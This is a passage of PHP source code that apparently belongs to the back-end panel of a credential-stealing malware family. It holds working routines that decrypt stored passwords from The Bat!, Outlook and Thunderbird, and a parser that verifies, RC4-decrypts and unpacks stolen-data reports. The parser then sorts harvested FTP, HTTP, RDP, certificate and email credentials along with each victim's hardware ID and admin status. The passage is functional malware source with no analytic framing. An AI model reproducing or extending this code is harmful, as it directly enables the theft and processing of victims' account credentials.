10147. } elseif ($flag == 1)
10148. {
10149. switch ($seq)
10150. {
10151. case 0x00008131;
10152. $protocol = $offs;
10153. break;
10154. case 0x00008180:
10155. $smtp_port = $offs;
10156. break;
10157. case 0x0000817e:
10158. $pop3_port = $offs;
10159. break;
10160. case 0x0000817c:
10161. $imap_port = $offs;
10162. break;
10163. }
10164. }
10165.  
10166. if (!$stream->state || $stream->eof())
10167. break;
10168. }
10169.  
10170. if ($protocol == 0)
10171. {
10172. // pop3
10173. $this->add_email($email, 'pop3', $server, $pop3_port, $user, $pass);
10174. }
10175. elseif ($protocol == 1)
10176. {
10177. // imap
10178. $this->add_email($email, 'imap', $server, $imap_port, $user, $pass);
10179. }
10180.  
10181. // smtp
10182. if (!strlen($smtp_user) && !strlen($smtp_pass) && strlen($user) && strlen($pass))
10183. {
10184. $smtp_user = $user;
10185. $smtp_pass = $pass;
10186. }
10187. $this->add_email($email, 'smtp', $smtp_server, $smtp_port, $smtp_user, $smtp_pass);
10188. }
10189.  
10190. protected function process_cfg($cfg_file)
10191. {
10192. if (strlen($cfg_file) < 4)
10193. return;
10194.  
10195. $stream = new stream_thebat($cfg_file, $this->log);
10196.  
10197. $email = '';
10198. $server = '';
10199. $user = '';
10200. $pass = '';
10201. $smtp_port = '';
10202. $pop3_port = '';
10203. //$imap_port = '';
10204. $smtp_server = '';
10205. $smtp_user = '';
10206. $smtp_pass = '';
10207.  
10208. while ($stream->state && !$stream->eof())
10209. {
10210. $seq = $stream->read_dword();
10211. $len = $stream->read_dword();
10212. if ($len < 0)
10213. {
10214. $this->log->add("ERR_INVALID_TB_CFG_FILE");
10215. break;
10216. }
10217. $next_offset = $stream->pos + $len;
10218.  
10219. switch ($seq)
10220. {
10221. case 0x02:
10222. $email = $stream->read_str();
10223. break;
10224. case 0x0a:
10225. $smtp_server = $stream->read_str();
10226. break;
10227. case 0x0b:
10228. $server = $stream->read_str();
10229. break;
10230. case 0x0c:
10231. $smtp_port = $stream->read_dword();
10232. break;
10233. case 0x0d:
10234. $pop3_port = $stream->read_dword();
10235. break;
10236. case 0x0e:
10237. //$imap_port = $stream->read_dword();
10238. break;
10239. case 0x0f:
10240. $user = $this->decrypt($stream->read_str());
10241. break;
10242. case 0x10:
10243. $pass = $this->decrypt($stream->read_str());
10244. break;
10245. case 0x2b:
10246. $smtp_user = $stream->read_str();
10247. break;
10248. case 0x2f:
10249. $smtp_pass = $this->decrypt($stream->read_str());
10250. break;
10251. }
10252.  
10253. $stream->seek($next_offset);
10254. }
10255.  
10256. // pop3/imap
10257. $this->add_email($email, 'pop3', $server, $pop3_port, $user, $pass);
10258.  
10259. // smtp
10260. if (!strlen($smtp_user) && !strlen($smtp_pass) && strlen($user) && strlen($pass))
10261. {
10262. $smtp_user = $user;
10263. $smtp_pass = $pass;
10264. }
10265. $this->add_email($email, 'smtp', $smtp_server, $smtp_port, $smtp_user, $smtp_pass);
10266. }
10267.  
10268. public function import_item($stream, $id)
10269. {
10270. switch ($id)
10271. {
10272. case 0x0000:
10273. // old config
10274. $cfg_file = $stream->read_str();
10275. $this->process_cfg($cfg_file);
10276. break;
10277. case 0x0001:
10278. // new config
10279. $cfn_file = $stream->read_str();
10280. $this->process_cfn($cfn_file);
10281. break;
10282. default:
10283. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
10284. return false;
10285. }
10286. return true;
10287. }
10288. }
10289.  
10290. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
10291. // Outlook
10292.  
10293. class module_outlook extends module
10294. {
10295. private $values = array();
10296. private $pstorage = array();
10297.  
10298. private function process_values()
10299. {
10300. // email address
10301. $email = assign($this->values['SMTP Email Address']);
10302. if (!strlen($email))
10303. $email = assign($this->values['Email']);
10304. if (!strlen($email))
10305. $email = assign($this->values['NNTP Email Address']);
10306.  
10307. // smtp
10308. $smtp_server = assign($this->values['SMTP Server']);
10309. $smtp_user = assign($this->values['SMTP User Name']);
10310. if (!strlen($smtp_user))
10311. $smtp_user = assign($this->values['SMTP User']);
10312. $smtp_pass = assign($this->values['SMTP Password']);
10313. if (!strlen($smtp_pass))
10314. assign($this->values['SMTP Password2']);
10315.  
10316. // pop3
10317. $pop_server = assign($this->values['POP3 Server']);
10318. $pop_user = assign($this->values['POP3 User Name']);
10319. if (!strlen($pop_user))
10320. $pop_user = assign($this->values['POP3 User']);
10321. $pop_pass = assign($this->values['POP3 Password']);
10322. if (!strlen($pop_pass))
10323. $pop_pass = assign($this->values['POP3 Password2']);
10324.  
10325. // imap
10326. $imap_server = assign($this->values['IMAP Server']);
10327. $imap_user = assign($this->values['IMAP User Name']);
10328. if (!strlen($imap_user))
10329. $imap_user = assign($this->values['IMAP User']);
10330. $imap_pass = assign($this->values['IMAP Password']);
10331. if (!strlen($imap_pass))
10332. $imap_pass = assign($this->values['IMAP Password2']);
10333.  
10334. // ports
10335. $smtp_port = assign($this->values['SMTP Port']);
10336. $pop_port = assign($this->values['POP3 Port']);
10337. $imap_port = assign($this->values['IMAP Port']);
10338.  
10339. // sync pop3 -> smtp
10340. if (!strlen($smtp_user) && !strlen($smtp_pass) && strlen($pop_user) && strlen($pop_pass))
10341. {
10342. $this->add_email($email, 'smtp', $smtp_server, $smtp_port, $pop_user, $pop_pass);
10343. }
10344. // sync imap -> smtp
10345. if (!strlen($smtp_user) && !strlen($smtp_pass) && strlen($imap_user) && strlen($imap_pass))
10346. {
10347. $this->add_email($email, 'smtp', $smtp_server, $smtp_port, $imap_user, $imap_pass);
10348. }
10349. $this->add_email($email, 'smtp', $smtp_server, $smtp_port, $smtp_user, $smtp_pass);
10350. $this->add_email($email, 'pop3', $pop_server, $pop_port, $pop_user, $pop_pass);
10351. $this->add_email($email, 'imap', $imap_server, $imap_port, $imap_user, $imap_pass);
10352. }
10353.  
10354.  
10355. private function decrypt_old($value)
10356. {
10357. if (strlen($value) <= 2)
10358. return '';
10359.  
10360. if (ord($value[0]) == 1 && ord($value[1]) == 1)
10361. {
10362. // registry
10363. $value = substr($value, 2);
10364. if (strlen($value) <= 4)
10365. return '';
10366.  
10367. $l = data_int32(substr($value, 0, 4));
10368. $value = substr($value, 4);
10369.  
10370. if (strlen($value) != $l)
10371. return '';
10372.  
10373. $value = chr(0x75).chr(0x18).chr(0x15).chr(0x14).$value;
10374. $decrypted_pass = '';
10375.  
10376. for ($i = 1; $i <= int_divide($l, 4); $i++)
10377. {
10378. $int_value = data_int32(substr($value, $i*4, 4)) ^ data_int32(substr($value, ($i-1)*4, 4));
10379. $value[$i*4+0] = chr(($int_value) & 0xff);
10380. $value[$i*4+1] = chr(($int_value >> 8) & 0xff);
10381. $value[$i*4+2] = chr(($int_value >> 16) & 0xff);
10382. $value[$i*4+3] = chr(($int_value >> 24) & 0xff);
10383. }
10384.  
10385. for ($i = int_divide($l, 4)*4+1; $i <= int_divide($l, 4)*4 + ($l%4); $i++)
10386. {
10387. $value[$i+3] = chr(ord($value[$i+3]) ^ ord($value[$i+3-($l%4)]));
10388. }
10389.  
10390. return ztrim(substr($value, 4));
10391. } else if (ord($value[0]) == 1 && ord($value[1]) == 2)
10392. {
10393. // pstorage
10394. $value = ztrim(unicode_to_ansi(substr($value, 2)));
10395. return assign($this->pstorage[$value]);
10396. }
10397.  
10398. return '';
10399. }
10400.  
10401. public function import_item($stream, $id)
10402. {
10403. switch ($id)
10404. {
10405. case 0x0000:
10406. // plain values
10407. $item_name = $stream->read_str();
10408. $item_value = $stream->read_str();
10409.  
10410. $this->values[$item_name] = $item_value;
10411. break;
10412. case 0x0001:
10413. // passwords2 pstorage
10414. $item_name = $stream->read_str();
10415. $item_value = $stream->read_str();
10416. $this->values[$item_name] = ztrim(assign($this->pstorage[$item_value]));
10417. break;
10418. case 0x0002:
10419. // passwords2 registry (CryptUnprotectData)
10420. $item_name = $stream->read_str();
10421. $item_value = $stream->read_str();
10422. $this->values[$item_name] = $item_value;
10423. break;
10424. case 0x0003:
10425. // passwords
10426. $item_name = $stream->read_str();
10427. $item_value = $this->decrypt_old($stream->read_str());
10428.  
10429. $this->values[$item_name] = $item_value;
10430. break;
10431. case 0x0004:
10432. // binary/dword values (port numbers, etc)
10433. $item_name = $stream->read_str();
10434. $item_value = $stream->read_str();
10435. if (strlen($item_value) == 4)
10436. {
10437. $item_value = data_int32($item_value);
10438. $this->values[$item_name] = strval($item_value);
10439. }
10440. break;
10441. case 0x0005:
10442. case 0x0006:
10443. // pstorage values
10444. $item_name = $stream->read_str();
10445. $stream->read_str(); // guid
10446. $value = $stream->read_str();
10447. $this->pstorage[$item_name] = $value;
10448. break;
10449. case 0x0007:
10450. // pstorage values stored as subtype guid
10451. $stream->read_str(); // name
10452. $guid = $stream->read_str();
10453. $value = $stream->read_str();
10454. $value = substr($value, 4);
10455. $this->pstorage[$guid] = $value;
10456. break;
10457. case 0x0010:
10458. // process password data
10459. $this->process_values();
10460.  
10461. // clear values array
10462. $this->values = array();
10463. break;
10464. default:
10465. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
10466. return false;
10467. }
10468. return true;
10469. }
10470. }
10471.  
10472. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
10473. // Thunderbird
10474.  
10475. class module_thunderbird extends module
10476. {
10477. private $mailboxes = array();
10478.  
10479. protected function process_conf($value)
10480. {
10481. if (!strlen($value))
10482. return;
10483.  
10484. $line_start = 'user_pref(';
10485. $line_end = ');';
10486.  
10487. $values = parse_lines($value);
10488.  
10489. $conf_values = array();
10490.  
10491. foreach ($values as $line)
10492. {
10493. $line = Utf8ToWin(trim($line));
10494. if (str_begins($line, $line_start) && str_ends($line, $line_end))
10495. {
10496. $line = stripslashes(substr($line, strlen($line_start), -strlen($line_end)));
10497. if (strlen($line) < 2)
10498. continue;
10499. $name_end = strpos($line, '",');
10500. if ($name_end !== false && $line[0] == '"')
10501. {
10502. $name = substr($line, 1, $name_end-1);
10503.  
10504. $value = trim(substr($line, $name_end+2));
10505.  
10506. if (str_begins($value, '"') && str_ends($value, '"'))
10507. $value = trim(substr($value, 1, -1));
10508.  
10509. $name = strtolower($name);
10510. $conf_values[$name] = $value;
10511. }
10512. }
10513. }
10514.  
10515. $accounts = assign($conf_values['mail.accountmanager.accounts']);
10516. $accounts = explode(',', $accounts);
10517. if (is_array($accounts) && count($accounts))
10518. {
10519. foreach ($accounts as $account)
10520. {
10521. $server = assign($conf_values['mail.account.'.$account.'.server']);
10522.  
10523. $host = assign($conf_values['mail.server.'.$server.'.hostname']);
10524. $port = assign($conf_values['mail.server.'.$server.'.port']);
10525. $user = assign($conf_values['mail.server.'.$server.'.username']);
10526. $protocol = assign($conf_values['mail.server.'.$server.'.type']);
10527.  
10528. $pass = '';
10529.  
10530. if ($protocol == 'imap')
10531. {
10532. if (isset($this->mailboxes['imap://'.$host]))
10533. $pass = $this->mailboxes['imap://'.$host][1];
10534. } elseif ($protocol == 'pop3')
10535. {
10536. if (isset($this->mailboxes['pop3://'.$host]))
10537. $pass = $this->mailboxes['pop3://'.$host][1];
10538. }
10539.  
10540. if (!strlen($pass))
10541. {
10542. if (isset($this->mailboxes['mailbox://'.$host]))
10543. $pass = $this->mailboxes['mailbox://'.$host][1];
10544. else
10545. $pass = '';
10546. }
10547.  
10548. $identities = assign($conf_values['mail.account.'.$account.'.identities']);
10549. $identities = explode(',', $identities);
10550. if (is_array($identities) && count($identities))
10551. {
10552. foreach ($identities as $identity)
10553. {
10554. $email = assign($conf_values['mail.identity.'.$identity.'.useremail']);
10555. $smtp_name = assign($conf_values['mail.identity.'.$identity.'.smtpserver']);
10556.  
10557. // find default server
10558. if (!strlen($smtp_name))
10559. {
10560. $smtp_name = assign($conf_values['mail.smtp.defaultserver']);
10561. }
10562. if (!strlen($smtp_name))
10563. {
10564. $smtp_names = assign($conf_values['mail.smtpservers']);
10565. $smtp_names = explode(',', $smtp_names);
10566. if (is_array($smtp_names) && count($smtp_names))
10567. $smtp_name = $smtp_names[0];
10568. }
10569.  
10570. $smtp_host = assign($conf_values['mail.smtpserver.'.$smtp_name.'.hostname']);
10571. $smtp_user = assign($conf_values['mail.smtpserver.'.$smtp_name.'.username']);
10572. $smtp_port = assign($conf_values['mail.smtpserver.'.$smtp_name.'.port']);
10573.  
10574. if (isset($this->mailboxes['smtp://'.$smtp_host]))
10575. $smtp_pass = $this->mailboxes['smtp://'.$smtp_host][1];
10576. else
10577. $smtp_pass = '';
10578.  
10579. if (is_array($smtp_pass))
10580. $smtp_pass = $smtp_pass[1];
10581.  
10582. // pop3/imap
10583. if ($protocol == 'pop3' || $protocol == 'imap')
10584. $this->add_email($email, $protocol, $host, $port, $user, $pass);
10585.  
10586. $this->add_email($email, 'smtp', $smtp_host, $smtp_port, $smtp_user, $smtp_pass);
10587. }
10588. }
10589. }
10590. }
10591. }
10592.  
10593. public function import_item($stream, $id)
10594. {
10595. switch ($id)
10596. {
10597. case 0x0000:
10598. // mailbox passwords
10599. $mailbox = trim(Utf8ToWin($stream->read_str()));
10600. $user = trim(Utf8ToWin($stream->read_str()));
10601. $pass = trim(Utf8ToWin($stream->read_str()));
10602. if (strlen($user) && strlen($pass) && strlen($mailbox))
10603. $this->mailboxes[$mailbox] = array($user, $pass);
10604. break;
10605. case 0x0001:
10606. // server settings file
10607. $js_conf_file = $stream->read_str();
10608. $this->process_conf($js_conf_file);
10609. break;
10610. default:
10611. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
10612. return false;
10613. }
10614. return true;
10615. }
10616. }
10617.  
10618. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
10619. // FastTrack
10620. class module_fasttrack extends module
10621. {
10622.  
10623. }
10624.  
10625. // ========================================================================================================================
10626.  
10627. class report_parser
10628. {
10629. public $log;
10630. public $options = array();
10631.  
10632. public $ftp_lines = array();
10633. public $http_lines = array();
10634. public $rdp_lines = array();
10635. public $cert_lines = array();
10636. public $email_lines = array();
10637.  
10638. public $report_os_name;
10639. public $report_is_win64;
10640. public $report_user_country;
10641. public $report_user_language;
10642. public $report_is_admin;
10643. public $report_hwid;
10644. public $report_version_id;
10645.  
10646. function __construct($options = '')
10647. {
10648. $this->log = new debug_log();
10649. if (is_array($options))
10650. $this->options = $options;
10651. }
10652.  
10653. // find module processing class for certain ID
10654. private function find_class($id, $stream)
10655. {
10656. global $global_module_list ;
10657. for ($i = 0; $i < count($global_module_list); $i++)
10658. {
10659. if (!class_exists($global_module_list[$i][0]))
10660. {
10661. $this->log->add("ERR_CLASS_DOES_NOT_EXIST");
10662. return null;
10663. }
10664. if ($global_module_list[$i][1] == $id)
10665. return new $global_module_list[$i][0]($stream, $this->log, $this->options);
10666. }
10667. return null;
10668. }
10669.  
10670. public static function flat_email_array($email_array)
10671. {
10672. // protocol + email
10673. $result = trim($email_array['protocol']).'://'.trim($email_array['email']).'|';
10674.  
10675. // server + port
10676. $result .= trim($email_array['server']);
10677.  
10678. $port = trim($email_array['port']);
10679.  
10680. if (strlen($port) && $port != '0')
10681. $result .= ':'.$port;
10682.  
10683. // user:password
10684. $result .= '|'.trim($email_array['user']).'|'.trim($email_array['pass']);
10685.  
10686. return $result;
10687. }
10688.  
10689. // import and decrypt module data
10690. private function import_module($stream)
10691. {
10692. $hdr_id = $stream->read_strlen(8); // module header_id
10693.  
10694. // check module header identifier
10695. if ($hdr_id != REPORT_MODULE_HEADER || !$stream->state)
10696. {
10697. $this->log->add("ERR_INVALID_MODULE_HEADER");
10698. return false;
10699. }
10700.  
10701. $mod_len = $stream->read_dword(); // module length
10702. $mod_id = $stream->read_word(); // module id
10703. /*$mod_ver = */$stream->read_word(); // module version
10704.  
10705. if (!$stream->state)
10706. {
10707. $this->log->add("ERR_CANNOT_READ_MODULE_HEADER");
10708. return false;
10709. }
10710.  
10711. $module = $this->find_class($mod_id, $stream);
10712.  
10713. if ($module)
10714. {
10715. global $global_verbose_log;
10716.  
10717. if ($mod_len == 16)
10718. return true; // empty module
10719. if ($mod_len < 16) // module length should be always greater than 16 bytes (header length)
10720. {
10721. $this->log->add("ERR_MODULE_LEN_INCORRECT");
10722. return false;
10723. }
10724. if ($global_verbose_log)
10725. $this->log->add("NOTIFY_IMPORT_DATA: ".get_class($module));
10726. $mod_len -= 16; // header length
10727.  
10728. if ($module->import_data($mod_len))
10729. {
10730. if (get_class($module) == 'module_systeminfo')
10731. {
10732. $this->report_os_name = $module->os_name;
10733. $this->report_is_win64 = $module->is_win64;
10734. $this->report_user_country = $module->user_country;
10735. $this->report_user_language = $module->user_language;
10736. $this->report_is_admin = $module->is_admin;
10737. $this->report_hwid = $module->hwid;
10738. } else
10739. {
10740. foreach ($module->ftp_list as $value)
10741. {
10742. array_push($this->ftp_lines, array(trim($value), get_class($module)));
10743.  
10744. global $global_verbose_log;
10745. if ($global_verbose_log)
10746. $this->log->add("NOTIFY_NEW_FTP: ".$value);
10747. }
10748.  
10749. foreach ($module->http_list as $value)
10750. {
10751. array_push($this->http_lines, array(trim($value), get_class($module)));
10752.  
10753. global $global_verbose_log;
10754. if ($global_verbose_log)
10755. $this->log->add("NOTIFY_NEW_HTTP: ".$value);
10756. }
10757.  
10758. foreach ($module->rdp_list as $value)
10759. {
10760. array_push($this->rdp_lines, array(trim($value), get_class($module)));
10761.  
10762. global $global_verbose_log;
10763. if ($global_verbose_log)
10764. $this->log->add("NOTIFY_NEW_RDP: ".$value);
10765. }
10766.  
10767. foreach ($module->cert_list as $value)
10768. {
10769. array_push($this->cert_lines, array($value, get_class($module)));
10770.  
10771. global $global_verbose_log;
10772. if ($global_verbose_log)
10773. $this->log->add("NOTIFY_NEW_CERT");
10774. }
10775.  
10776. foreach ($module->email_list as $value)
10777. {
10778. array_push($this->email_lines, array($value, get_class($module)));
10779.  
10780. global $global_verbose_log;
10781. if ($global_verbose_log)
10782. $this->log->add("NOTIFY_NEW_EMAIL: ".$this->flat_email_array($value));
10783. }
10784. }
10785. return true;
10786. }
10787. } else
10788. $this->log->add("ERR_UNKNOWN_MODULE_ID");
10789. return false;
10790. }
10791.  
10792. // unpack stream data using ported apLib algorithm
10793. private function unpack_stream($packed_data, $unpacked_len)
10794. {
10795. if (!$unpacked_len)
10796. return '';
10797.  
10798. if ($unpacked_len > REPORT_LEN_LIMIT)
10799. {
10800. $this->log->add("ERR_CANNOT_UNPACK_DATA_MEMLIMIT");
10801. return '';
10802. }
10803.  
10804. $unpacked_data = '';
10805. $depack_len = aP_depack($packed_data, $unpacked_data, $unpacked_len);
10806.  
10807. if ($depack_len > REPORT_LEN_LIMIT)
10808. {
10809. $this->log->add("ERR_CANNOT_UNPACK_DATA_MEMLIMIT");
10810. return '';
10811. }
10812.  
10813. if ($depack_len == $unpacked_len)
10814. {
10815. return $unpacked_data;
10816. } else
10817. {
10818. $this->log->add("ERR_CANNOT_UNPACK_DATA");
10819. return '';
10820. }
10821. }
10822.  
10823. protected function process_report_data($data, $report_password)
10824. {
10825. if (strlen($data) == 0)
10826. {
10827. $this->log->add("ERR_NO_REPORT_DATA");
10828. return false;
10829. } else if (strlen($data) < 12) // length cannot be less than 12 bytes (8-byte header + crc32 checksum)
10830. {
10831. $this->log->add("ERR_INVALID_REPORT_DATALEN");
10832. return false;
10833. } else if (strlen($data) > REPORT_LEN_LIMIT)
10834. {
10835. $this->log->add("ERR_CANNOT_PROCESS_REPORT_MEMLIMIT");
10836. return false;
10837. } elseif (strlen($data) == 12) // empty report
10838. return true;
10839.  
10840. // extract crc32 checksum from datastream
10841. $crc_chk = data_int32(substr($data, strlen($data)-4));
10842.  
10843. // remove crc32 checksum from the data stream
10844. $data = substr($data, 0, -4);
10845.  
10846. // check report validness
10847. $crc_chk = obf_crc32($crc_chk);
10848.  
10849. if ((int)crc32($data) != (int)$crc_chk)
10850. {
10851. $this->log->add("ERR_REPORT_CRC_MISMATCH");
10852. return false;
10853. }
10854.  
10855. $stream = new stream($data, $this->log);
10856.  
10857. $report_id = $stream->read_strlen(8);
10858.  
10859. if ($report_id == REPORT_CRYPTED_HEADER && $stream->state)
10860. {
10861. $decrypted_data = rc4Decrypt($report_password, substr($data, 8));
10862.  
10863. // there's another crc32 checksum available to verify the decryption process
10864.  
10865. // extract crc32 checksum from decrypted datastream
10866. $crc_chk = data_int32(substr($decrypted_data, strlen($decrypted_data)-4));
10867.  
10868. // remove crc32 checksum from the data stream
10869. $decrypted_data = substr($decrypted_data, 0, -4);
10870.  
10871. // check report validness
10872. $crc_chk = obf_crc32($crc_chk);
10873.  
10874. if ((int)crc32($decrypted_data) != (int)$crc_chk)
10875. {
10876. $this->log->add("ERR_REPORT_WRONG_PASSWORD");
10877. return false;
10878. }
10879.  
10880. // update current stream with decrypted data
10881. $stream = new stream($decrypted_data, $this->log);
10882. $report_id = $stream->read_strlen(8);
10883.  
10884. }
10885.  
10886.  
10887.  
10888. if ($report_id == REPORT_PACKED_HEADER && $stream->state)
10889. {
10890. // unpack stream data
10891. $unpacked_len = $stream->read_dword();
10892. $packed_data = $stream->read_str();
10893.  
10894. if (($unpacked_len > REPORT_LEN_LIMIT) || (strlen($packed_data) > REPORT_LEN_LIMIT))
10895. {
10896. $this->log->add("ERR_UNPACK_LEN_LIMIT");
10897. return false;
10898. }
10899.  
10900. if (!strlen($packed_data))
10901. {
10902. $this->log->add("ERR_UNPACK_NULL");
10903. return false;
10904. }
10905.  
10906. $unpacked_data = "";
10907.  
10908. if ($stream->state && strlen($packed_data))
10909. $unpacked_data = $this->unpack_stream($packed_data, $unpacked_len);
10910.  
10911. if (!strlen($unpacked_data))
10912. {
10913. $this->log->add("ERR_UNPACK_FAIL");
10914. return false;
10915. }
10916.  
10917. if (strlen($unpacked_data) > REPORT_LEN_LIMIT)
10918. {
10919. $this->log->add("ERR_UNPACK_LEN_LIMIT");
10920. return false;
10921. }
10922.  
10923. $stream = new stream($unpacked_data, $this->log);
10924. $report_id = $stream->read_strlen(8);
10925. }
10926.  
10927. if ($report_id != REPORT_HEADER || !$stream->state)
10928. {
10929. $this->log->add("ERR_INVALID_REPORT_HEADER");
10930. return false;
10931. }
10932.  
10933. $version_id = ztrim($stream->read_strlen(8));
10934. if (!$stream->state)
10935. {
10936. $this->log->add("ERR_CANNOT_READ_VERSION_ID");
10937. return false;
10938. }
10939.  
10940. if ($version_id != REPORT_VERSION)
10941. {
10942. $this->log->add("ERR_INVALID_VERSION_ID");
10943. return false;
10944. }
10945.  
10946. $this->report_version_id = $version_id;
10947.  
10948. while ($stream->state && $stream->pos < $stream->datalen)
10949. {
10950. if (!$this->import_module($stream, $this->log))
10951. {
10952. $this->log->add("ERR_CANNOT_IMPORT_MODULE");
10953. return false;
10954. }
10955. }
10956. return (($stream->pos == $stream->datalen) && ($stream->state));
10957. }
10958.  
10959. public function process_report($data, $report_password = '')
10960. {
10961. $success_result = $this->process_report_data($data, $report_password);
10962. if (!$success_result)
10963. $this->log->add("ERR_IMPORT_FAILED");
10964. if ($success_result)
10965. {
10966. global $global_verbose_log;
10967. if ($global_verbose_log)
10968. $this->log->add("NOTIFY_IMPORT_SUCCESS");
10969. }
10970. return $success_result;
10971. }
10972.  
10973. public static function verify_report_file_header(&$data)
10974. {
10975. if ((substr($data, 0, strlen(REPORT_HEADER))) == REPORT_HEADER)
10976. return true;
10977. if ((substr($data, 0, strlen(REPORT_PACKED_HEADER))) == REPORT_PACKED_HEADER)
10978. return true;
10979. if ((substr($data, 0, strlen(REPORT_CRYPTED_HEADER))) == REPORT_CRYPTED_HEADER)
10980. return true;
10981. return false;
10982. }
10983.  
10984. public static function check_report_crypted_header(&$data)
10985. {
10986. if ((substr($data, 0, strlen(REPORT_CRYPTED_HEADER))) == REPORT_CRYPTED_HEADER)
10987. return true;
10988. return false;
10989. }
10990.  
10991. public static function pre_decrypt_report(&$data, $report_password = '')
10992. {
10993. if ((substr($data, 0, strlen(REPORT_CRYPTED_HEADER))) != REPORT_CRYPTED_HEADER)
10994. return false;
10995.  
10996. if (strlen($data) == 0)
10997. {
10998. return false;
10999. } else if (strlen($data) < 12) // length cannot be less than 12 bytes (8-byte header + crc32 checksum)
11000. {
11001. return false;
11002. } else if (strlen($data) > REPORT_LEN_LIMIT)
11003. {
11004. return false;
11005. } elseif (strlen($data) == 12) // empty report
11006. return false;
11007.  
11008. // extract crc32 checksum from datastream
11009. $crc_chk = data_int32(substr($data, strlen($data)-4));
11010.  
11011. // remove crc32 checksum from the encrypted data stream
11012. $encrypted_data = substr($data, 0, -4);
11013.  
11014. // check report validness
11015. $crc_chk = obf_crc32($crc_chk);
11016.  
11017. if ((int)crc32($encrypted_data) != (int)$crc_chk)
11018. {
11019. return false;
11020. }
11021.  
11022. $decrypted_data = rc4Decrypt($report_password, substr($encrypted_data, 8));
11023.  
11024. // there's another crc32 checksum available to verify the decryption process
11025.  
11026. // extract crc32 checksum from decrypted datastream
11027. $crc_chk = data_int32(substr($decrypted_data, strlen($decrypted_data)-4));
11028.  
11029. // remove crc32 checksum from the data stream
11030. $decrypted_data_check = substr($decrypted_data, 0, -4);
11031.  
11032. // check report validness
11033. $crc_chk = obf_crc32($crc_chk);
11034.  
11035. if ((int)crc32($decrypted_data_check) != (int)$crc_chk)
11036. {
11037. return false;
11038. }
11039.  
11040. $data = $decrypted_data;
11041. return true;
11042. }
11043. }